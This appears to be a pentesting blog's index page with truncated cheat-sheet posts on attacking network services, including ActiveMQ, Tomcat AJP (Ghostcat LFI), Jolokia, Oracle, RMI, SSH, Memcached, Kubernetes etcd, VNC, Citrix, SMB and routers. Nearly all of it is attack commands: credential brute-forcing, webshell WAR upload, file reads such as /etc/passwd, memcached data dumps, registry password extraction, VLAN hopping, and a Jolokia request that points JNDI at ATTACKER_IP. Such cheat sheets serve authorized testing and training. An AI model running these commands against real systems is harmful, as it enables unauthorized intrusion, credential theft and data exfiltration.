
Posts

Showing posts from 2022

ActiveMQ OpenWire Transport Pentest

#Commonly observed on ports 32064, 32357, 61616. You will find it together with RMI (port 1099) and a web server (6161 - Jetty).

Nmap scan
nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10

Web server -- http://10.10.10.10:8161/admin -> default creds: admin:admin

#Query the server
curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA"
curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue

Connecting to ActiveMQ (might require creds)
#Download activemq from here
unzip filename
go to conf/activemq-cli.config --> and update the IP address
broker {
  local {
    amqurl = "tcp://10.10.10.10:32064"
    jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi"
    username = ""
    password = ""
    prompt-color = "light-blue&q

Apache Jserv - Port 8009

NMAP
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 10.10.10.10

Ghost vulnerability - LFI
Patched versions: after 9.0.31, 8.5.51, and 7.0.100
git clone https://github.com/doggycheng/CNVD-2020-10487.git
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

AJPy
git clone https://github.com/hypn0s/AJPy.git
python3 setup.py install
#Get version
python tomcat.py version 10.10.10.10
#Brute force the manager (users list for -U, password list for -P)
python tomcat.py -v bf -U /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt -P /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_pass.txt /manager/html 10.10.10.10
#Upload WAR file
python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
#List available applications
python tomcat.py list -u tomcat -p tomcat 172.17.0.2
#Ghost LFI CVE exploit
python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2

Other attacks - Rev proxy attack nginx Module abuse - Re

Jolokia Pentest

Usually found under - no default port - can be used under any web server
/jolokia
/actuator/jolokia

#Get basic version info and where it is being used
curl http://10.10.10.10:8899/jolokia/
#Get the list of functions
curl http://10.10.10.10/jolokia/list
#Check vuln status for the AccessLogValve exploit
curl -kL http://10.10.10.10:8080/jolokia/read/Catalina:host=localhost,name=AccessLogValve,type=Valve
#Access an instance
curl -d '{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/ldap://ATTACKER_IP:8001/jmxrm" } }' 'http://VICTIM_IP:8080/jolokia/'

Jolokia Tool Kit
git clone https://github.com/laluka/jolokia-exploitation-toolkit
python jolokia-parser.py http://10.10.10.10:8899/jolokia/ | tee jolokia-list.log
#Command exec - based on the output, create the command
grep createStandardHost jolokia-list.log
curl -skg 'http:

Pentesting Oracle TNS listener/ Database - Port 1521

#nmap
nmap -Pn -sV -p1521 --script=oracle* 10.10.10.10
#Check for service version
#Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5:
#try this exploit: GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability
nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10

Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP

ODAT - Oracle Database Attacking Tool
#Download the release https://github.com/quentinhardy/odat/releases/
tar -xvf filename
#Run
./odat all -s 10.10.10.10
./odat all -s 10.10.10.10 -d SID_NAME
./odat all -s 10.10.10.10 -d ''
#Check with creds
./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password
#Bruteforce when you know the SID
./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt
#Enum - doesn't work if password protected
sudo apt install tnscmd10g
#Version
tnscmd10g version -h 10.10.10.10
#Status
tnscmd10g status -h 10.10.10.10

JMX RMI Pentest

RMI can run on any nonstandard port, and when RMI is running you will observe one more endpoint port connected to it (find it easily from nmap by running rmi-dumpregistry).
#The jmxrmi bound name and its signatures might be vulnerable to the MLetMBean vuln, where an MBean can be used for loading additional MBeans over the network.
java.lang.String getVersion()
javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg)

Java RMI Registry - Port 1616
nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616 10.10.10.10

BaRMIe
#Download the package from releases https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01
java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000

Remote Method Guesser
https://github.com/qtc-de/remote-method-guesser
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum
#Look for vulnerabilities
java -jar rmg.jar enum 10.10.10.10 5000
#Get bound names & available method

RPC Mapper Pentest - Port 135, 593

rpcdump.py 10.10.10.10 -p 593

TCP 135 is the Endpoint Mapper and Component Object Model (COM) Service Control Manager. There's a tool called rpcmap.py from Impacket that will show these mappings. This tool needs a stringbinding argument to make its connection. The examples from -h are:
stringbinding  String binding to connect to MSRPC interface, for example:
  ncacn_ip_tcp:192.168.0.1[135]
  ncacn_np:192.168.0.1[\pipe\spoolss]
  ncacn_http:192.168.0.1[593]
  ncacn_http:[6001,RpcProxy=exchange.contoso.com:443]
  ncacn_http:localhost[3388,RpcProxy=rds.contoso:443]
rpcmap.py 'ncacn_ip_tcp:10.10.10.10'

Reference for MS-DCOM
#if you find IOXIDResolver in the UUIDs you can run the script below to list network interfaces
git clone https://github.com/mubix/IOXIDResolver.git
cd IOXIDResolver
python3 -m pip install -r requirements.txt
python IOXIDResolver.py -t 10.10.10.10

Other things to check
reg.py 10.10.10.10 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s service

Pentesting Domain Controllers

DNS
dig srv domain.com @DC_IP
#Query ldap service
dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP
#Query root domain controller
dig +short a rootdc.domain.com @DC_IP

LDAP Enum
#Nmap scan for basic info
nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10
#Get domain name
ldapsearch -x -h 10.10.10.10 -s base namingcontexts
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts
#Look for misconfigs - finding ms-MCS-AdmPwd
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
#Dump everything
ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)'
#Dump everything using ldeep
ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump

UserEnum
git clone https://github.com/Bhanunamikaze/Wordlists.git
cd Wordlists/Usernames
kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt

Find pre-auth disabled users
GetNPUsers.py domain/ -u

Puppet Master Server - Port 8140

Checklist
Check the version vulnerabilities (get the version from the API); refer to this Tenable article.
Check whether Puppet naive autosigning is enabled --> it should be disabled; you can scan for it via "nmap -p8140 --script puppet-naivesigning -sV 10.10.10.10"
nmap -sSVC --privileged -vvv --reason -p 8140 --script puppet-naivesigning --script-args puppet-naivesigning.csr=/path/to/csr.pem,puppet-naivesigning.env=production,puppet-naivesigning.node=DomainnameOfAppServerControlledByPuppet 10.10.10.10
Look for unauthenticated API access.
If the API is accessible, run all commands to get sensitive info.

Run this script, Puppet_Pentest.py, to run most of the commands below at once.
#Check whether Puppet Server is running on a server or not
https://10.10.10.10:8140/status/v1/simple
#Puppet service information - check services info (agents)
curl -k -X GET https://PUPPET-SERVER:8140/status/v1/services
#Retrieve information about services running on Puppet Server
https://10.10.10.10:8140/status/v

SSH Pentest - Port 22

NMAP commands
nmap -sCV -p22 10.10.10.10
#nmap vuln scan
nmap -sC --script vuln,vulners -Pn -p22 10.10.10.10
#nmap algorithm enum
#if you find CBC & HMAC in ciphers --> vulnerable
nmap -Pn -sS -sV -p 22 --script ssh2-enum-algos 10.10.10.10

Brute forcing
hydra -L userx.txt -P wordlist.txt -v VICTIM_IP ssh
hydra -l username -P password_file.txt -s port VICTIM_IP ssh

Enum via Metasploit
#User enum --> works only on a few old versions
use auxiliary/scanner/ssh/ssh_enumusers
#Version detection
use auxiliary/scanner/ssh/ssh_version
#Bruteforcing SSH
use auxiliary/scanner/ssh/ssh_login
#FTP bruteforce
use auxiliary/scanner/ftp/ftp_login

Cracking SSH private key .ppk
sudo apt install putty-tools
#Generate id_rsa for ssh login; if it asks for a password, the password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa
putty2john private.ppk > hash
john --format=PuTTY --fork=4 hash -w=wordlist.txt
#Enter the cracked password
puttygen private.ppk -O private-openssh -

Memcache Pentest - Port 11211,10013

Memcached - Port 11211,10013
telnet 10.10.10.10 10014
#run stats to view info
stats
version

Enum using mem tools
apt install libmemcached-tools
#Get stats
memcstat --servers=10.10.10.10
#Dump key/value pairs
memcdump --servers=10.10.10.10
#Upload a file
memccp --servers=10.10.10.10 a.txt
#View a file
memccat --servers=10.10.10.10 /etc/passwd
#List items
stats items

Enum using Metasploit
use auxiliary/gather/memcached_extractor
set rhosts 10.10.10.10
run

Bruteforcing Memcached creds
#!/bin/bash
# usage: ./script <target> <username> <wordlist>
while read -r F ; do
  echo "Trying $F"
  if memcstat --servers="$1" --username="$2" --password="$F" | grep -q Server ; then
    echo "Password Found: $F"
    break
  fi
done < "$3"
./script $target $username <wordlist>

Dump all the data from the keys/files
while read -r key; do [ -f "$key" ] || echo "get $key" | nc 10.10.10.10 11211 > "$key.dump"; done < <(memcdump --servers=10.10.10.10)

Check this out for more in

Kubernetes Pentest

Ports info
Kubelet API: Port 10250: the Kubelet is the main component in every node; all pod operations go through the kubelet
Etcd: Port 2379: etcd is a DB that stores the cluster's data; it contains configuration and current state information, and might contain secrets
API Server: Port 6443: the API server is in charge of all operations on the cluster - check API access

Kube-Hunter
#Download kube-hunter from the releases https://github.com/aquasecurity/kube-hunter/releases
./kube-hunter
#start active scan
./kube-hunter --cidr 10.10.10.10 --active

ETCD anonymous access
2379/tcp & 2380/tcp - etcd servers
Download etcdctl from here
etcdctl --endpoints=http://10.10.10.10:2379 get / --prefix --keys-only
#Loop over a list of hosts (one per line in kube_pods)
for ip in $(cat kube_pods); do echo "---------- testing $ip -----------"; etcdctl --endpoints=http://$ip:2380 get / --prefix --keys-only | grep -v "rpc error:"; done

Look for open pods
Ports 10200 - 10259
curl -kvL https://10.10.1

VNC Pentest

#nmap - finding VNC enabled servers
nmap -Pn -p5900,5901,5902,5903,5905,5906,5910,5911,5912,5914,5915,5916 10.10.10.0/24
#Nmap script scan
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p5900 10.10.10.10
#VNC brute using nmap
nmap -Pn -sV -p5900 --script vnc-brute 10.10.10.10

Metasploit auth scanning
use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS 192.168.1.0/24
set THREADS 50
run
or use
use auxiliary/scanner/vnc/vnc_login

Brute forcing VNC creds
hydra -s 5901 -P pass.txt -t 16 10.10.10.10 vnc

VNC 4 --> Real VNC 4 - auth bypass

Get VNC password from registry
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server" /v PasswordViewOnly
vncpwd.exe PASSWORD_FROM_ABOVE

Search for the keywords "pass, cred, vnc and config"
dir /s *pass* == *cred* == *vnc* == *.config*

NTP Pentest - Port 123

NTP - Port 123
nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 10.10.10.10
ntpq -c readlist <IP_ADDRESS>
ntpq -c readvar <IP_ADDRESS>
ntpq -c peers <IP_ADDRESS>
ntpq -c associations <IP_ADDRESS>
ntpdc -c monlist <IP_ADDRESS>
ntpdc -c listpeers <IP_ADDRESS>
ntpdc -c sysinfo <IP_ADDRESS>
#You can use any of the commands below:
:config drefid mreadlist readvar addvars exit mreadvar reslist apeers help mrl rl associations host mrulist rmvars authenticate hostnames mrv rv authinfo ifstats ntpversion saveconfig cl iostats opeers showvars clearvars kerninfo passociations sysinfo clocklist keyid passwd sysstats clockvar keytype peers timeou

Web Penetration Testing with Curl

In a lot of scenarios we don't have GUI access to web applications, but in most of them you can find curl installed on the test machine, so below is a simple cheat sheet for running basic checks.
#GET request using curl (-i prints the response headers too)
curl -i http://10.10.10.10
#Send POST request
curl --data "param1=value1&param2=value2" http://10.10.10.10
#Check for TRACE method
curl -k -v -X TRACE http://10.10.10.10
#PUT request
curl -X PUT -d "PUT request data" http://10.10.10.10
curl -kL https://10.10.10.10 -T file.txt
#HEAD request
curl -I http://10.10.10.10
#Test DEBUG method --> if the response is "OK" --> DEBUG is enabled
curl -X DEBUG https://10.10.10.10 -k -v -H "Command: stop-debug"
#Ignore SSL warnings
curl -k https://10.10.10.10
#Follow redirection
curl -L http://10.10.10.10
#Add headers in a JSON GET request
curl -i -H "Accept: application/json" -H "Content-Type: application/json" http://10.10.10.10
#

Internal Pentesting Citrix Servers

Citrix Servers - Ports
1604 - Citrix MetaFrame ICA
1494/tcp open citrix-ica Citrix Metaframe XP ICA - Citrix VDI (Virtual Delivery Agent)
2598/tcp open citriximaclient
#Below 4 are used in load balancers
3008/tcp open ssl/midnight-tech?
3009/tcp open ssl/mep Citrix NetScaler Metric Exchange Protocol
3010/tcp open gw? Citrix NetScaler Gateway
3011/tcp open mep Citrix NetScaler Metric Exchange Protocol

#Read targets from a file (-iL)
nmap -sS -sU --script citrix-enum-apps,citrix-enum-servers -iL ips.txt -Pn -oA citrix

For Citrix ADC - default username/password: nsroot/nsroot

Finding Citrix ADC version
https://10.10.10.10/nitro/v1/config/nsversion
or
curl -X GET -H "Content-Type: application/json" -u nsroot:examplepassword http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nsversion
curl -X GET -H "Content-Type: application/json" -u <username>:<examplepassword> http://<Citrix-ADC-IP-address(NSIP)>/nit

SMB Pentest

SMB Enum Scripts and Checklists

Enumerating SMB shares
#!/usr/bin/perl
use strict;
use warnings;

my $host = "10.10.10.10";
my $filename = "/usr/share/wordlists/SecLists/blob/master/Discovery/Web-Content/common.txt";
open(my $fh, '<', $filename) or die $!;
while (my $word = <$fh>) {
    chomp($word);
    ## Try to login with a username and no password
    my $result = qx( smbclient //$host/$word -N 2>/dev/null );
    ## ACCESS_DENIED means the share exists
    ## BAD_NETW_NAME means the share does not exist
    if ($result =~ /NT_STATUS_ACCESS_DENIED/g ) {
        print "[+] Share Found \@ //$host/$word\n";
        next;
    }
}
close($fh);

UnCommon Ports

cPanel ports
cPanel 2082
cPanel - SSL 2083
WHM 2086
WHM - SSL 2087
Webmail 2095
Webmail - SSL 2096
SFTP Shared/Reseller Servers 2222
Webdisk 2077
Webdisk - SSL 2078
SSH Shared/Reseller Servers 2222
Plesk Control Panel 8880
Plesk Control Panel - SSL 8443
Plesk Windows Webmail (SmarterMail) 9998
DotNet Panel 9001

NDMP
Port 10000 - NDMP
nmap -p 10000 --script ndmp-fs-info,vuln -sVC -d 10.10.10.10
Port 30000 - NDMPS
nmap -p 30000 --script ndmp-fs-info,vuln -sVC -d 10.10.10.10
NetApp NDFS common ports

Parallel Virtual File System (PVFS) TCP port 3334 - heap overflow

RDP - Port 3389
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 10.10.10.10

Docker - Port 2375
2375: unencrypted docker socket, remote root passwordless access to the host
2376: tls encrypted socket, most likely this is your CI servers 4243 port as a modification of the https 443 port
2377: swarm mode socket, for swarm managers, not for docker clients
5000: docker registry service
4789 and 7946

Pentesting Routers & Switches

Penetration testing routers & switches
Routersploit, Nipper-ng, dig, nslookup, port 1999, snmpsniff (v1 is vulnerable), test for NTP

Routersploit
git clone https://www.github.com/threat9/routersploit.git/
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
search exploit
search scanner
use scanners/autopwn
set target 10.10.10.10

Attacking switches using Yersinia on Spanning Tree Protocol (STP)
good doc https://github.com/tomac/yersinia
#launch GUI
yersinia -G
# yersinia protocol -h
#Start the STP attack and capture the traffic - sensitive info will be exposed to the network

VLAN enumeration, hopping and trunking
git clone https://github.com/nccgroup/vlan-hopping.git
./frogger.sh
#VLAN hopping/trunking can be done via yersinia as well
#Create a new fake trunk, let the switch believe that you are a trunk, and get the info via VLAN hopping
yersinia -G
go to DTP --> enable trunking

# Test for finger services
finger -l 10.10.10.10
finger -l user@10.10.10.10
Tes